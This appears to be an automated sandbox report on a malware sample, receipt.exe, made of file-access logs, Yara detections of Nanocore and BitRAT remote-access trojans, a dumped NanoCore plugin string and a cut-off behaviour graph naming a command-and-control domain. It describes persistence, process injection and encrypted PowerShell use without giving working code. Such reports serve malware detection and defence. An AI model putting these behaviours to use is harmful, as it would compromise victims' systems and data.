Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Queries volume information: C:\Users\user\Desktop\receipt.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Queries volume information: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Queries volume information: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Queries volume information: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Queries volume information: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe VolumeInformation
Source: C:\Users\user\Desktop\receipt.exe Queries volume information: C:\Users\user\Desktop\receipt.exe VolumeInformation
Source: C:\Users\user\Desktop\receipt.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\receipt.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\receipt.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected BitRAT
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\uIyibZtq20fMk9Yx.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\time[1].exe, type: DROPPED
Yara detected Nanocore RAT
Source: Yara match File source: 12.2.receipt.exe.3f72bc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.receipt.exe.3fc2be0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.receipt.exe.3f4aba0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.receipt.exe.3f72bc0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.receipt.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.receipt.exe.3fc2be0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.receipt.exe.3f4aba0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001A.00000000.520669433.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.568818536.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.563939937.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.566317945.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: receipt.exe PID: 5804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: receipt.exe PID: 1840, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected BitRAT
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\uIyibZtq20fMk9Yx.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\time[1].exe, type: DROPPED
Detected Nanocore Rat
Source: receipt.exe, 0000000C.00000002.552831356.0000000002F63000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: receipt.exe, 0000000C.00000002.568818536.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: receipt.exe, 0000000C.00000002.566317945.0000000003F23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: receipt.exe, 0000001A.00000000.520669433.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: receipt.exe, 0000001A.00000002.601877963.0000000003223000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: receipt.exe, 0000001A.00000002.601877963.0000000003223000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Yara detected Nanocore RAT
Source: Yara match File source: 12.2.receipt.exe.3f72bc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.receipt.exe.3fc2be0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.receipt.exe.3f4aba0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.receipt.exe.3f72bc0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.receipt.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.receipt.exe.3fc2be0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.receipt.exe.3f4aba0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001A.00000000.520669433.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.568818536.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.563939937.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.566317945.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: receipt.exe PID: 5804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: receipt.exe PID: 1840, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 712166 Sample: receipt.exe Startdate: 29/09/2022 Architecture: WINDOWS Score: 100 68 uzu.duckdns.org 2->68 76 Malicious sample detected (through community Yara rule) 2->76 78 Antivirus detection for dropped file 2->78 80 Antivirus / Scanner detection for submitted sample 2->80 82 11 other signatures 2->82 9 receipt.exe 1 7 2->9         started        13 Uewizrlgm.exe 4 2->13         started        15 Uewizrlgm.exe 3 2->15         started        signatures3 process4 file5 60 C:\Users\user\AppData\...\Uewizrlgm.exe, PE32 9->60 dropped 62 C:\Users\...\Uewizrlgm.exe:Zone.Identifier, ASCII 9->62 dropped 64 C:\Users\user\AppData\...\receipt.exe.log, ASCII 9->64 dropped 86 Encrypted powershell cmdline option found 9->86 88 Creates multiple autostart registry keys 9->88 90 Injects a PE file into a foreign processes 9->90 17 receipt.exe 1 7 9->17         started        21 powershell.exe 16 9->21         started        23 receipt.exe 9->23         started        92 Antivirus detection for dropped file 13->92 94 Machine Learning detection for dropped file 13->94 25 powershell.exe 13->25         started        27 Uewizrlgm.exe 13->27         started        29 powershell.exe 15->29         started        31 Uewizrlgm.exe 15->31         started        signatures6 process7 file8 50 C:\Users\user\AppData\...\Cfrstztdf.exe, PE32 17->50 dropped 52 C:\Users\user\AppData\...\Rzqhcgbd1time.exe, PE32 17->52 dropped 54 C:\Users\...\Cfrstztdf.exe:Zone.Identifier, ASCII 17->54 dropped 70 Encrypted powershell cmdline option found 17->70 72 Creates multiple autostart registry keys 17->72 74 Injects a PE file into a foreign processes 17->74 33 Rzqhcgbd1time.exe 17->33         started        38 powershell.exe 13 17->38         started        40 receipt.exe 17->40         started        42 conhost.exe 21->42         started        44 conhost.exe 25->44         started        46 conhost.exe 29->46         started        signatures9 process10 dnsIp11 66 